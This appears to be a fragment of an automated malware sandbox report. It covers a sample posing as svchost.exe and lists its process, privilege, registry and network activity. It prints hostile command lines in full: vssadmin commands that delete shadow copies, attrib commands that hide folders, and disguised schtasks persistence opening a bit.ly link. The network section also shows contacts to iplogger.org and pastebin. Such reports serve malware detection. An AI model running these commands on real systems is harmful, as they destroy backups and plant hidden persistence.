N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3084 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2824 wrote to memory of 4716 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2824 wrote to memory of 4716 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2824 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2824 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 3084 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3084 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3084 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 3804 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 3804 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 532 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 532 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3084 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 888 wrote to memory of 3540 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 888 wrote to memory of 3540 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3128 wrote to memory of 4088 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3128 wrote to memory of 4088 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2520 wrote to memory of 1056 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2520 wrote to memory of 1056 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1308 wrote to memory of 4456 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1308 wrote to memory of 4456 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3804 wrote to memory of 1832 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3804 wrote to memory of 1832 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 532 wrote to memory of 2988 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 532 wrote to memory of 2988 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1484 wrote to memory of 2964 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1484 wrote to memory of 2964 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2504 wrote to memory of 3044 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2504 wrote to memory of 3044 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1652 wrote to memory of 4320 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1652 wrote to memory of 4320 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3776 wrote to memory of 2020 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3776 wrote to memory of 2020 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2464 wrote to memory of 2228 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2464 wrote to memory of 2228 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 752 wrote to memory of 2896 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 752 wrote to memory of 2896 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4284 wrote to memory of 1868 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4284 wrote to memory of 1868 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3084 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3084 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3084 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3084 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\schtasks.exe

System policy modification

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Run C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "11:59" /sc daily /mo "1" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "08:33" /sc daily /mo "3" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "10:17" /sc daily /mo "5" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "10:36" /sc weekly /mo "2" /d "Sat" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "03:18" /sc monthly /m "may" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 89.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 ftp.encompossoftware.com udp
US 64.40.144.30:21 ftp.encompossoftware.com tcp
US 8.8.8.8:53 113.132.67.172.in-addr.arpa udp
US 8.8.8.8:53 30.144.40.64.in-addr.arpa udp
US 64.40.144.30:33039 ftp.encompossoftware.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 www.example.com udp
US 172.67.19.24:443 pastebin.com tcp
US 147.185.221.16:59320 tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 16.221.185.147.in-addr.arpa udp
US 93.184.215.14:443 www.example.com tcp
US 8.8.8.8:53 14.215.184.93.in-addr.arpa udp
US 8.8.8.8:53 74.90.14.23.in-addr.arpa udp
